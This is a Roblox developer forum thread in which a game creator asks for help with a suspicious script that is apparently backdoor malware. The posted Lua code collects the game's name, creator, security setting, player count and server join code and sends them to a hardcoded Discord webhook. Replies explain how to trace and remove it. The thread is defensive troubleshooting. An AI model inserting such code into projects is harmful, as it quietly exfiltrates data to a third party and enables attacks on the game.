Unidentified script causing an Https error

mcox6 · April 24, 2021, 3:53pm

Hi, today while I was testing my game, I noticed an error:
and I never actually thought about this error much… until today. Today I decided to click the error and it bought me to a script that looks extremely suspicious. It looks like it may be a Roblox script, but some aspects of it look like the script shouldn’t be in my game.

this is the script:









function owner()
	if game.CreatorType == Enum.CreatorType.User then
		return "User"
	elseif game.CreatorType == Enum.CreatorType.Group then
		return "Group"
	end
end



function name()
	if owner() == "User" then
		local lol = game.Players:GetNameFromUserIdAsync(game.CreatorId)
		return lol
	elseif owner() == "Group" then
		local hehe = game.GroupService:GetGroupInfoAsync(game.CreatorId).Owner
		return hehe
	end
end	



function filtering()
	if game.Workspace.FilteringEnabled == true then
		return "ENABBLED"
	else
		if game.Workspace.FilteringEnabled == false then
			return "DISABLED"
		end
	end
end


local placeId = game.PlaceId
local p = game.Players:GetChildren()
local l1 = "https://discord.com/api/webhooks/796814416443080734/LUsF2UA2gAbOj9vhhMtust2yV6jQOwZbEFFHxuIV8KUjL4dzhhQyxDWm5tDQ_cBjrqdT"
local PlaceId = game.PlaceId
local plrs = game.Players
local maxplayers = plrs.MaxPlayers
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local plr = game:GetService("Players")
local HTTP = game:GetService("HttpService")
local Data = 
	{
		["content"] = "",
		["embeds"] = {{
			["title"] = "New Game Logged",
			["description"] = "Game Logged: " .. "**"..GetName.Name.."**",
			["type"] = "rich",
			["color"]= tonumber(0xff9429),
			["footer"] = {
				["icon_url"] = '',
				["text"] = "NovaSS | 2021."
			},
			["thumbnail"] = {
				["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png",
			},
			["author"] = {
				["name"] = "NovaSS",
				["icon_url"] = ""
			},
			["fields"] = {
				{
					["name"] = "Link:",
					["value"] = "https://www.roblox.com/games/"..game.PlaceId.."",
					["inline"] = false
				},

				{
					["name"] = "Creator:",
					["value"] = name(),
					["inline"] = false
				},

				{
					["name"] = "**__Creator Type:__**",
					["value"] = owner(),
					["inline"] = false
				},

				{
					["name"] = "**__FilteringEnabled:__**",
					["value"] = filtering(),
					["inline"] = false
				},

				{
					["name"] = "**__Server Players:__**",
					["value"] = #plrs:GetPlayers().."/"..game.Players.MaxPlayers,
					["inline"] = false
				},
				{
					["name"] = '**__Server Code:__**',
					["value"] = "```lua\nRoblox.GameLauncher.JoinGameInstance("..game.PlaceId..","..'"'..game.JobId..'"'..")```",
					["inline"] = false

				}


			}
		}
		}
	}

Data = HTTP:JSONEncode(Data)
HTTP:PostAsync(l1, Data)

(For size reasons I’ve only posted the code rather than the 60 thousand some-odd number of lines)

Now here’s my question Where is it and how do I get rid of it?

I’ve done more investigating and it obviously isn’t a Roblox script as it has a discord webhook liked to it .

If anyone can help I’d greatly appreciate it, because it looks as if this is an exploit or some sort of backdoor that has recently gotten into my game. Thanks in advanced!

EmbatTheHybrid · April 24, 2021, 3:57pm

Looks like a backdoor or just a virus, I believe it’s caused by another script adding it in as I had a similar script appear for me in a game I was helping out with, does it get added when you’re testing? If so, look through suspicious scripts in the explorer and then test again to see if it’s gone

mcox6 · April 24, 2021, 3:57pm

Actually I traced the script back during testing and I found it here

I’m going to see if there’s any other script adding it in

Some extra documentation of scripts for anyone who gets this issue later:

Group mentioned: Divine Entities - Roblox

Links back to a raids discord group

EmbatTheHybrid · April 24, 2021, 3:58pm

Looks like that shoudl be the cause, delete those and see if it stops it, if not, you may have other scripts causing it

mcox6 · April 24, 2021, 4:08pm

Quick question, should I report this to roblox and then delete this because I don’t want them coming after me or anything… (they’re a raid group btw)

EmbatTheHybrid · April 24, 2021, 4:09pm

You could if you want to after you delete it as they wont really know you deleted it, and not sure if they even got a webhook response since the request errored, so you should be safe

2014patrick · April 24, 2021, 4:20pm

This script is using API Services to send messages to a Discord webhook aka sending a message to a Discord Server. The message includes your game link, your Username, filtering service, active players, etc. However, as long as you have HTTP Services & API Services disabled (Home, Settings, Security) it can not send any messages to the Server. The script probably gets implemented by another Script using the require() line.

You can search all your Scripts by right-clicking anywhere in the top bar in any free area and select “find results”, afterward click the “Find in all scripts” and enter require in “find what:”. It will list all Scripts using the require() line.

If you have any other issues, feel free to DM me.

mcox6 · April 24, 2021, 4:46pm

Thank you for the help! (charlimit)

2014patrick · April 24, 2021, 5:07pm

No problem.
I’m glad I was able to help.